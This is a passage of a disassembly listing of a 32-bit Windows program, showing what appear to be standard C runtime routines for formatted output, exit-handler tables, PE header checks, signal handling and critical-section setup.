cmp ecx, esi
jnz short loc_407294
loc_4072A0: ; CODE XREF: sub_406AC5+7D3�j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072A7: ; CODE XREF: sub_406AC5+429�j
cmp edi, esi
jnz short loc_4072B3
mov eax, off_4107C8
mov [ebp+1F8h+var_21C], eax
loc_4072B3: ; CODE XREF: sub_406AC5+7E4�j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_4072BF
; ---------------------------------------------------------------------------
loc_4072B8: ; CODE XREF: sub_406AC5+7FC�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4072C3
inc eax
loc_4072BF: ; CODE XREF: sub_406AC5+7F1�j
cmp ecx, esi
jnz short loc_4072B8
loc_4072C3: ; CODE XREF: sub_406AC5+7F7�j
sub eax, [ebp+1F8h+var_21C]
loc_4072C6: ; CODE XREF: sub_406AC5+4E1�j
; sub_406AC5+4E9�j ...
mov [ebp+1F8h+var_220], eax
loc_4072C9: ; CODE XREF: sub_406AC5+3B0�j
; sub_406AC5+461�j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_4073CE
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_4072FF
test ax, 100h
jz short loc_4072E6
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_4072F8
; ---------------------------------------------------------------------------
loc_4072E6: ; CODE XREF: sub_406AC5+819�j
test al, 1
jz short loc_4072F0
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_4072F8
; ---------------------------------------------------------------------------
loc_4072F0: ; CODE XREF: sub_406AC5+823�j
test al, 2
jz short loc_4072FF
mov [ebp+1F8h+var_230], 20h
loc_4072F8: ; CODE XREF: sub_406AC5+81F�j
; sub_406AC5+829�j
mov [ebp+1F8h+var_234], 1
loc_4072FF: ; CODE XREF: sub_406AC5+813�j
; sub_406AC5+82D�j
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_40731F
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406A57
add esp, 0Ch
loc_40731F: ; CODE XREF: sub_406AC5+847�j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_406A7B
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40734C
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40734C
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406A57
add esp, 0Ch
loc_40734C: ; CODE XREF: sub_406AC5+870�j
; sub_406AC5+876�j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_4073A6
test eax, eax
jle short loc_4073A6
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_40735F: ; CODE XREF: sub_406AC5+8D7�j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40A86B
add esp, 10h
test eax, eax
jnz short loc_4073A0
cmp [ebp+1F8h+var_268], eax
jz short loc_4073A0
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_406A7B
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_40735F
jmp short loc_4073B3
; ---------------------------------------------------------------------------
loc_4073A0: ; CODE XREF: sub_406AC5+8BA�j
; sub_406AC5+8BF�j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_4073B3
; ---------------------------------------------------------------------------
loc_4073A6: ; CODE XREF: sub_406AC5+88E�j
; sub_406AC5+892�j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_406A7B
pop ecx
loc_4073B3: ; CODE XREF: sub_406AC5+8D9�j
; sub_406AC5+8DF�j
cmp [ebp+1F8h+var_22C], 0
jl short loc_4073CE
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_4073CE
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406A57
add esp, 0Ch
loc_4073CE: ; CODE XREF: sub_406AC5+57C�j
; sub_406AC5+808�j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4073E1 ; default
push [ebp+1F8h+var_24C]
call sub_40405A
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4073E1: ; CODE XREF: sub_406AC5+19C�j
; sub_406AC5+1BF�j ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_407411
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406C23
; ---------------------------------------------------------------------------
loc_4073FA: ; CODE XREF: sub_406AC5+36E�j
; sub_406AC5+55B�j
call sub_403F8F
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406B35
; ---------------------------------------------------------------------------
loc_407411: ; CODE XREF: sub_406AC5+158�j
; sub_406AC5+166�j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_40741E
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40741E: ; CODE XREF: sub_406AC5+950�j
mov eax, [ebp+1F8h+var_22C]
loc_407421: ; CODE XREF: sub_406AC5+88�j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_403F45
add ebp, 1F8h
leave
retn
sub_406AC5 endp
; ---------------------------------------------------------------------------
off_407439 dd offset loc_406E07 ; DATA XREF: sub_406AC5+1A2�r
dd offset loc_406C6E ; jump table for switch statement
dd offset loc_406C89
dd offset loc_406CD8
dd offset loc_406D12
dd offset loc_406D1A
dd offset loc_406D51
dd offset loc_406E49
; =============== S U B R O U T I N E =======================================
sub_407459 proc near ; CODE XREF: sub_407541+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push dword_413BB4
call sub_4062CC
push dword_413BB0
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_4062CC
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb loc_40750A
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_40750A
push esi
call sub_40A965
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_4074E9
mov eax, 800h
cmp esi, eax
jnb short loc_4074AA
mov eax, esi
loc_4074AA: ; CODE XREF: sub_407459+4D�j
add eax, esi
cmp eax, esi
jb short loc_4074C0
push eax
push [esp+18h+var_4]
call sub_4093AB
test eax, eax
pop ecx
pop ecx
jnz short loc_4074D7
loc_4074C0: ; CODE XREF: sub_407459+55�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_40750A
push eax
push [esp+18h+var_4]
call sub_4093AB
test eax, eax
pop ecx
pop ecx
jz short loc_40750A
loc_4074D7: ; CODE XREF: sub_407459+65�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_406255
pop ecx
mov dword_413BB4, eax
loc_4074E9: ; CODE XREF: sub_407459+44�j
push [esp+14h+arg_0]
call sub_406255
mov [edi], eax
add edi, 4
push edi
call sub_406255
pop ecx
mov dword_413BB0, eax
mov eax, [esp+18h+arg_0]
pop ecx
jmp short loc_40750C
; ---------------------------------------------------------------------------
loc_40750A: ; CODE XREF: sub_407459+27�j
; sub_407459+37�j ...
xor eax, eax
loc_40750C: ; CODE XREF: sub_407459+AF�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_407459 endp
; =============== S U B R O U T I N E =======================================
sub_407512 proc near ; DATA XREF: seg001:0040D22C�o
push esi
push 4
push 20h
call sub_409363
mov esi, eax
push esi
call sub_406255
add esp, 0Ch
test esi, esi
mov dword_413BB4, eax
mov dword_413BB0, eax
jnz short loc_40753A
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40753A: ; CODE XREF: sub_407512+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_407512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407541 proc near ; CODE XREF: sub_40757D+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E5A0
call __SEH_prolog4
call loc_40428E
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_407459
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407577
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_407541 endp
; =============== S U B R O U T I N E =======================================
sub_407577 proc near ; CODE XREF: sub_407541+28�p
; DATA XREF: seg001:0040E5B8�o
call sub_404297
retn
sub_407577 endp
; =============== S U B R O U T I N E =======================================
sub_40757D proc near ; CODE XREF: sub_40434B+44�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407541
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_40757D endp
; =============== S U B R O U T I N E =======================================
sub_40758F proc near ; CODE XREF: seg001:loc_404C8F�p
push esi
push edi
mov eax, offset dword_40E480
mov edi, offset dword_40E480
cmp eax, edi
mov esi, eax
jnb short loc_4075B0
loc_4075A1: ; CODE XREF: sub_40758F+1F�j
mov eax, [esi]
test eax, eax
jz short loc_4075A9
call eax
loc_4075A9: ; CODE XREF: sub_40758F+16�j
add esi, 4
cmp esi, edi
jb short loc_4075A1
loc_4075B0: ; CODE XREF: sub_40758F+10�j
pop edi
pop esi
retn
sub_40758F endp
; =============== S U B R O U T I N E =======================================
sub_4075B3 proc near ; DATA XREF: sub_40434B+3F�o
push esi
push edi
mov eax, offset dword_40E488
mov edi, offset dword_40E488
cmp eax, edi
mov esi, eax
jnb short loc_4075D4
loc_4075C5: ; CODE XREF: sub_4075B3+1F�j
mov eax, [esi]
test eax, eax
jz short loc_4075CD
call eax
loc_4075CD: ; CODE XREF: sub_4075B3+16�j
add esi, 4
cmp esi, edi
jb short loc_4075C5
loc_4075D4: ; CODE XREF: sub_4075B3+10�j
pop edi
pop esi
retn
sub_4075B3 endp
; =============== S U B R O U T I N E =======================================
sub_4075D7 proc near ; CODE XREF: sub_40434B:loc_40436E�p
push esi
push edi
xor edi, edi
loc_4075DB: ; CODE XREF: sub_4075D7+1A�j
lea esi, off_4107D0[edi]
push dword ptr [esi]
call sub_406255
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_4075DB
pop edi
pop esi
retn
sub_4075D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407600 proc near ; CODE XREF: sub_407680+3F�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40760E
loc_40760B: ; CODE XREF: sub_407600+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40760E: ; CODE XREF: sub_407600+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40760B
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_407600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407630 proc near ; CODE XREF: sub_407680+59�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40766C
mov edi, [esp+0Ch+arg_4]
loc_407652: ; CODE XREF: sub_407630+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_407662
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40766E
loc_407662: ; CODE XREF: sub_407630+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_407652
loc_40766C: ; CODE XREF: sub_407630+1C�j
xor eax, eax
loc_40766E: ; CODE XREF: sub_407630+30�j
pop edi
pop esi
pop ebx
retn
sub_407630 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407680 proc near ; CODE XREF: sub_40434B+E�p
; sub_40434B+79�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFEh
push offset dword_40E5C0
push offset sub_404650
mov eax, large fs:0
push eax
sub esp, 8
push ebx
push esi
push edi
mov eax, dword_410440
xor [ebp+var_8], eax
xor eax, ebp
push eax
lea eax, [ebp+var_10]
mov large fs:0, eax
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push offset __ImageBase
call sub_407600
add esp, 4
test eax, eax
jz short loc_407720
mov eax, [ebp+arg_0]
sub eax, offset __ImageBase
push eax
push offset __ImageBase
call sub_407630
add esp, 8
test eax, eax
jz short loc_407720
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+var_4], 0FFFFFFFEh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov ecx, [eax]
mov eax, [ecx]
xor edx, edx
cmp eax, 0C0000005h
setz dl
mov eax, edx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_407720: ; CODE XREF: sub_407680+49�j
; sub_407680+63�j
mov [ebp+var_4], 0FFFFFFFEh
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40773B proc near ; CODE XREF: sub_408B3E:loc_408B71�p
; DATA XREF: sub_407774�o ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_40E5E0
call __SEH_prolog4
call sub_4064E8
mov eax, [eax+78h]
test eax, eax
jz short loc_407769
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_407762
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_407762: ; CODE XREF: sub_40773B+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_407769: ; CODE XREF: sub_40773B+16�j
call sub_40AA11
call __SEH_epilog4
retn
sub_40773B endp
; =============== S U B R O U T I N E =======================================
sub_407774 proc near ; CODE XREF: sub_4044FF+33�p
push offset sub_40773B
call sub_406255
pop ecx
mov off_411BD4, eax
retn
sub_407774 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407786 proc near ; CODE XREF: seg001:00404D34�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_406471
mov esi, eax
test esi, esi
jz loc_4078E1
mov edx, [esi+5Ch]
mov eax, dword_41087C
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_4077AA: ; CODE XREF: sub_407786+34�j
cmp [ecx], edi
jz short loc_4077BC
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_4077AA
loc_4077BC: ; CODE XREF: sub_407786+26�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_4077CD
cmp [ecx], edi
jnz short loc_4077CD
mov eax, ecx
jmp short loc_4077CF
; ---------------------------------------------------------------------------
loc_4077CD: ; CODE XREF: sub_407786+3D�j
; sub_407786+41�j
xor eax, eax
loc_4077CF: ; CODE XREF: sub_407786+45�j
test eax, eax
jz short loc_4077DD
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_4077E4
loc_4077DD: ; CODE XREF: sub_407786+4B�j
xor eax, eax
jmp loc_4078DF
; ---------------------------------------------------------------------------
loc_4077E4: ; CODE XREF: sub_407786+55�j
cmp ebx, 5
jnz short loc_4077F5
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_4078DF
; ---------------------------------------------------------------------------
loc_4077F5: ; CODE XREF: sub_407786+61�j
cmp ebx, 1
jz loc_4078DC
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_4078CE
mov ecx, dword_410870
mov edi, dword_410874
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40784E
imul ecx, 0Ch
loc_40782D: ; CODE XREF: sub_407786+C3�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, dword_410870
mov ebx, dword_410874
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40782D
mov ebx, [ebp+var_4]
loc_40784E: ; CODE XREF: sub_407786+A2�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_407863
mov dword ptr [esi+64h], 83h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_407863: ; CODE XREF: sub_407786+D2�j
cmp eax, 0C0000090h
jnz short loc_407873
mov dword ptr [esi+64h], 81h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_407873: ; CODE XREF: sub_407786+E2�j
cmp eax, 0C0000091h
jnz short loc_407883
mov dword ptr [esi+64h], 84h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_407883: ; CODE XREF: sub_407786+F2�j
cmp eax, 0C0000093h
jnz short loc_407893
mov dword ptr [esi+64h], 85h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_407893: ; CODE XREF: sub_407786+102�j
cmp eax, 0C000008Dh
jnz short loc_4078A3
mov dword ptr [esi+64h], 82h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_4078A3: ; CODE XREF: sub_407786+112�j
cmp eax, 0C000008Fh
jnz short loc_4078B3
mov dword ptr [esi+64h], 86h
jmp short loc_4078C1
; ---------------------------------------------------------------------------
loc_4078B3: ; CODE XREF: sub_407786+122�j
cmp eax, 0C0000092h
jnz short loc_4078C1
mov dword ptr [esi+64h], 8Ah
loc_4078C1: ; CODE XREF: sub_407786+DB�j
; sub_407786+EB�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_4078D5
; ---------------------------------------------------------------------------
loc_4078CE: ; CODE XREF: sub_407786+8A�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_4078D5: ; CODE XREF: sub_407786+146�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_4078DC: ; CODE XREF: sub_407786+72�j
or eax, 0FFFFFFFFh
loc_4078DF: ; CODE XREF: sub_407786+59�j
; sub_407786+6A�j
pop ebx
pop edi
loc_4078E1: ; CODE XREF: sub_407786+F�j
pop esi
leave
retn
sub_407786 endp
; =============== S U B R O U T I N E =======================================
sub_4078E4 proc near ; CODE XREF: sub_4044FF+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411BD8, eax
mov dword_411BDC, eax
mov dword_411BE0, eax
mov dword_411BE4, eax
retn
sub_4078E4 endp
; =============== S U B R O U T I N E =======================================
sub_4078FD proc near ; CODE XREF: sub_40793E+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, dword_41087C
push esi
loc_407908: ; CODE XREF: sub_4078FD+1E�j
cmp [eax+4], edx
jz short loc_40791D
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_407908
loc_40791D: ; CODE XREF: sub_4078FD+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40792E
cmp [eax+4], edx
jz short locret_407930
loc_40792E: ; CODE XREF: sub_4078FD+2A�j
xor eax, eax
locret_407930: ; CODE XREF: sub_4078FD+2F�j
retn
sub_4078FD endp
; =============== S U B R O U T I N E =======================================
sub_407931 proc near ; CODE XREF: sub_40AA11:loc_40AA3E�p
push dword_411BE0
call sub_4062CC
pop ecx
retn
sub_407931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40793E proc near ; CODE XREF: sub_40AA11+38�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00407AE8 SIZE 00000006 BYTES
push 20h
push offset dword_40E600
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_4079A6
jz short loc_407971
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_407987
sub eax, ecx
jz short loc_407971
sub eax, ecx
jz short loc_4079D1
sub eax, ecx
jnz short loc_4079B5
loc_407971: ; CODE XREF: sub_40793E+1C�j
; sub_40793E+29�j
call sub_406471
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_407993
loc_40797F: ; CODE XREF: sub_40793E+91�j
or eax, 0FFFFFFFFh
jmp loc_407AE8
; ---------------------------------------------------------------------------
loc_407987: ; CODE XREF: sub_40793E+25�j
mov esi, offset dword_411BD8
mov eax, dword_411BD8
jmp short loc_4079F3
; ---------------------------------------------------------------------------
loc_407993: ; CODE XREF: sub_40793E+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_4078FD
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_407A00
; ---------------------------------------------------------------------------
loc_4079A6: ; CODE XREF: sub_40793E+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_4079E9
sub eax, 6
jz short loc_4079DD
dec eax
jz short loc_4079D1
loc_4079B5: ; CODE XREF: sub_40793E+31�j
call sub_403F8F
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_404E8B
add esp, 14h
jmp short loc_40797F
; ---------------------------------------------------------------------------
loc_4079D1: ; CODE XREF: sub_40793E+2D�j
; sub_40793E+75�j
mov esi, offset dword_411BE0
mov eax, dword_411BE0
jmp short loc_4079F3
; ---------------------------------------------------------------------------
loc_4079DD: ; CODE XREF: sub_40793E+72�j
mov esi, offset dword_411BDC
mov eax, dword_411BDC
jmp short loc_4079F3
; ---------------------------------------------------------------------------
loc_4079E9: ; CODE XREF: sub_40793E+6D�j
mov esi, offset dword_411BE4
mov eax, dword_411BE4
loc_4079F3: ; CODE XREF: sub_40793E+53�j
; sub_40793E+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_4062CC
loc_407A00: ; CODE XREF: sub_40793E+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_407AE8
cmp [ebp+var_20], eax
jnz short loc_407A1C
push 3
call sub_4044D0
loc_407A1C: ; CODE XREF: sub_40793E+D5�j
cmp [ebp+var_1C], eax
jz short loc_407A28
push eax
call sub_405121
pop ecx
loc_407A28: ; CODE XREF: sub_40793E+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_407A3C
cmp ebx, 0Bh
jz short loc_407A3C
cmp ebx, 4
jnz short loc_407A57
loc_407A3C: ; CODE XREF: sub_40793E+F2�j
; sub_40793E+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_407A8A
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_407A57: ; CODE XREF: sub_40793E+FC�j
cmp ebx, 8
jnz short loc_407A8A
mov ecx, dword_410870
mov [ebp+var_24], ecx
loc_407A65: ; CODE XREF: sub_40793E+14A�j
mov ecx, dword_410874
mov edx, dword_410870
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_407A91
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_407A65
; ---------------------------------------------------------------------------
loc_407A8A: ; CODE XREF: sub_40793E+10A�j
; sub_40793E+11C�j
call sub_4062C3
mov [esi], eax
loc_407A91: ; CODE XREF: sub_40793E+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407AB2
cmp ebx, 8
jnz short sub_407AC1
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_407AC5
sub_40793E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AAC proc near ; DATA XREF: seg001:0040E618�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_407AAC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AB2 proc near ; CODE XREF: sub_40793E+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_407AC0
push 0
call sub_405049
pop ecx
locret_407AC0: ; CODE XREF: sub_407AB2+4�j
retn
sub_407AB2 endp
; =============== S U B R O U T I N E =======================================
sub_407AC1 proc near ; CODE XREF: sub_40793E+162�j
push ebx
call dword ptr [ebp-20h]
loc_407AC5: ; CODE XREF: sub_40793E+16C�j
pop ecx
cmp ebx, 8
jz short loc_407AD5
cmp ebx, 0Bh
jz short loc_407AD5
cmp ebx, 4
jnz short loc_407AE6
loc_407AD5: ; CODE XREF: sub_407AC1+8�j
; sub_407AC1+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_407AE6
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_407AE6: ; CODE XREF: sub_407AC1+12�j
; sub_407AC1+1D�j
xor eax, eax
sub_407AC1 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40793E
loc_407AE8: ; CODE XREF: sub_40793E+44�j
; sub_40793E+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40793E
; =============== S U B R O U T I N E =======================================
sub_407AEE proc near ; CODE XREF: sub_4044FF+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411BEC, eax
retn
sub_407AEE endp
; =============== S U B R O U T I N E =======================================
sub_407AF8 proc near ; CODE XREF: sub_4044FF+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411BF8, eax
retn
sub_407AF8 endp
; =============== S U B R O U T I N E =======================================
sub_407B02 proc near ; CODE XREF: sub_4044FF+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411BFC, eax
retn
sub_407B02 endp
; ---------------------------------------------------------------------------
loc_407B0C: ; DATA XREF: sub_407B1C:loc_407B81�o
push dword ptr [esp+4]
call dword_40D178 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B1C proc near ; CODE XREF: sub_404FAB+26�p
; sub_40505E+78�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_40E620
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push dword_411BFC
call sub_4062CC
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_407B92
lea eax, [ebp+var_1C]
push eax
call sub_4042D8
pop ecx
cmp eax, edi
jz short loc_407B5A
push edi
push edi
push edi
push edi
push edi
call sub_404D8F
add esp, 14h
loc_407B5A: ; CODE XREF: sub_407B1C+2F�j
cmp [ebp+var_1C], 1
jz short loc_407B81
push offset aKernel32_dll_0 ; "kernel32.dll"
call dword_40D104 ; GetModuleHandleA
cmp eax, edi
jz short loc_407B81
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call dword_40D100 ; GetProcAddress
mov esi, eax
cmp esi, edi
jnz short loc_407B86
loc_407B81: ; CODE XREF: sub_407B1C+42�j
; sub_407B1C+51�j
mov esi, offset loc_407B0C
loc_407B86: ; CODE XREF: sub_407B1C+63�j
push esi
call sub_406255
pop ecx
mov dword_411BFC, eax
loc_407B92: ; CODE XREF: sub_407B1C+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; TlsSetValue
mov [ebp+var_20], eax
jmp short loc_407BD1
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_407BCD
push 8
call dword_40D164 ; RtlRestoreLastWin32Error
loc_407BCD: ; CODE XREF: sub_407B1C+A7�j
and [ebp+var_20], 0
loc_407BD1: ; CODE XREF: sub_407B1C+84�j
